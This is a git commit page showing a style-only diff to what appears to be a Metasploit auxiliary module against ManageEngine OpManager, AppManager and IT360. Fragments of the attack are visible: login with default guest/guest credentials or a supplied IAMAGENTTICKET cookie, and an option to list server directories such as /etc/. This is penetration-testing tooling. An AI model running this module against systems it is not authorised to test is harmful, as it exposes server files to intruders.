Do minor style fixes
parent
89f760c94e
commit
c5db13fba9
|
@ -44,17 +44,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80),
|
Opt::RPORT(80),
|
||||||
OptString.new('TARGETURI',
|
OptString.new('TARGETURI', [true, "The base path to OpManager, AppManager or IT360", '/']),
|
||||||
[ true, "The base path to OpManager, AppManager or IT360", '/' ]),
|
OptString.new('DIRECTORY', [true, 'Path of the directory to list', '/etc/']),
|
||||||
OptString.new('DIRECTORY', [false, 'Path of the directory to list', '/etc/']),
|
OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
|
||||||
OptString.new('IAMAGENTTICKET',
|
OptString.new('USERNAME', [true, 'The username to login as (IT360 target only)', 'guest']),
|
||||||
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
|
OptString.new('PASSWORD', [true, 'Password for the specified username (IT360 target only)', 'guest']),
|
||||||
OptString.new('USERNAME',
|
OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])
|
||||||
[true, 'The username to login as (IT360 target only)', 'guest']),
|
|
||||||
OptString.new('PASSWORD',
|
|
||||||
[true, 'Password for the specified username (IT360 target only)', 'guest']),
|
|
||||||
OptString.new('DOMAIN_NAME',
|
|
||||||
[false, 'Name of the domain to logon to (IT360 target only)'])
|
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -64,30 +59,33 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri(datastore['TARGETURI'])
|
'uri' => normalize_uri(datastore['TARGETURI'])
|
||||||
})
|
})
|
||||||
|
|
||||||
if res
|
if res
|
||||||
return res.get_cookies
|
return res.get_cookies
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def detect_it360
|
def detect_it360
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => "/",
|
'uri' => '/',
|
||||||
'method' => 'GET'
|
'method' => 'GET'
|
||||||
})
|
})
|
||||||
|
|
||||||
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def get_it360_cookie_name
|
def get_it360_cookie_name
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri("/"),
|
'uri' => normalize_uri('/')
|
||||||
})
|
})
|
||||||
|
|
||||||
cookie = res.get_cookies
|
cookie = res.get_cookies
|
||||||
|
|
||||||
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
||||||
return $1
|
return $1
|
||||||
else
|
else
|
||||||
|
@ -95,20 +93,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
def authenticate_it360(port, path, username, password)
|
def authenticate_it360(port, path, username, password)
|
||||||
if datastore['DOMAIN_NAME'] == nil
|
if datastore['DOMAIN_NAME'].nil?
|
||||||
vars_post = {
|
vars_post = {
|
||||||
'LOGIN_ID' => username,
|
'LOGIN_ID' => username,
|
||||||
'PASSWORD' => password,
|
'PASSWORD' => password,
|
||||||
'isADEnabled' => "false"
|
'isADEnabled' => 'false'
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
vars_post = {
|
vars_post = {
|
||||||
'LOGIN_ID' => username,
|
'LOGIN_ID' => username,
|
||||||
'PASSWORD' => password,
|
'PASSWORD' => password,
|
||||||
'isADEnabled' => "true",
|
'isADEnabled' => 'true',
|
||||||
'domainName' => datastore['DOMAIN_NAME']
|
'domainName' => datastore['DOMAIN_NAME']
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
@ -140,16 +136,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def login_it360
|
def login_it360
|
||||||
# Do we already have a valid cookie? If yes, just return that.
|
# Do we already have a valid cookie? If yes, just return that.
|
||||||
if datastore['IAMAGENTTICKET'] != nil
|
unless datastore['IAMAGENTTICKET'].nil?
|
||||||
cookie_name = get_it360_cookie_name
|
cookie_name = get_it360_cookie_name
|
||||||
cookie = "IAMAGENTTICKET" + cookie_name + "=" + datastore['IAMAGENTTICKET'] + ";"
|
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
|
||||||
return cookie
|
return cookie
|
||||||
end
|
end
|
||||||
|
|
||||||
# get the correct path, host and port
|
# get the correct path, host and port
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri("/"),
|
'uri' => normalize_uri('/')
|
||||||
})
|
})
|
||||||
|
|
||||||
if res && res.redirect?
|
if res && res.redirect?
|
||||||
|
@ -177,11 +173,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def run
|
def run
|
||||||
# No point to continue if directory is not specified
|
# No point to continue if directory is not specified
|
||||||
if datastore['DIRECTORY'].nil? || datastore['DIRECTORY'].empty?
|
if datastore['DIRECTORY'].empty?
|
||||||
print_error("Please supply the path of the directory you want to list.")
|
print_error('Please supply the path of the directory you want to list.')
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue